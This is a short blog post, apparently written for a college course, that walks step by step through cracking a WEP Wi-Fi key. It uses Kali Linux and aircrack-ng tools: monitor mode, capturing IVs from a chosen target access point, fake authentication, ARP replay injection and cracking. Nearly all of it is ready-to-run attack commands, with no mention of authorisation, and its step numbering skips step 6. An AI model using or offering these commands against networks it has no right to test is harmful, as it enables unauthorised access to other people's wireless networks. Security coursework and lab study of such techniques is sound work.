---
layout: post
title: "Blog 9"
description: "CIT 480 blog 9"
categories: [uncategorized]
tags: [random, jekyll]
redirect_from:
  - /2019/11/2/
---

# How to hack WEP Key?

__Hardware/Software Requirements__

* ALFA Network AWUS036AC WiFi Adapter.
* Kali Linux.

__Step 1: Install WiFi Adapter Driver on Kali Linux__

* Driver on Alfa Network’s Website will probably not work on Kali Linux. So perform steps below.
* apt-get update
* apt-get upgrade
* apt-get install realtek-rtl88xxau-dkms

__Step 2: Set WiFi Adapter to Monitor Mode__

To check if adapter is present

* iwconfig

To put WiFi Adapter in monitor mode.

* airmon-ng start wlan0

If processes are present then kill the processes.

* airmon-ng check kill

Run Again

* airmon-ng start wlan0

Confirm WiFi Adapter is in Monitor Mode

* iwconfig

__Step 3: Scan Network__

Find your target

* Airodump-ng wlan0

Copy BSSID of Target AP

Remember channel number

__Step 4: Start a IV Capture on Target AP__

* Open New Terminal
* airodump-ng -c <channel-number> --bssid <AP BSSID> -w <file_name> -i wlan0
	* -c to specify AP’s broadcasting channel
	* --bssid to specify MAC of Target AP
	* -w to specify where to save your initialization vectors
	* -i to save initialization vectors only and discard all other data

__Step 5: Fake Authentication__

WiFi Adapter needs to be associated with AP to be able to inject packets later. 

* Open New Terminal
* aireplay-ng -1 0 -e <SSID of Target AP> -a <BSSID of Target AP> wlan0
	* -1 means fake authentication
	* 0 means reassociation timing in seconds
	* -e to specify name of the network
	* -a is the access point MAC address

__Step 7: Packet Injection__

* Open New Terminal
* aireplay-ng -3 -b <AP MAC> wlan0
	* -3 ARP request replay
	* -b to specify AP MAC

__Step 8: Crack WEP Key__
#Collect enough IVs
* Open New Terminal
* aircrack-ng <file_name.cap>


























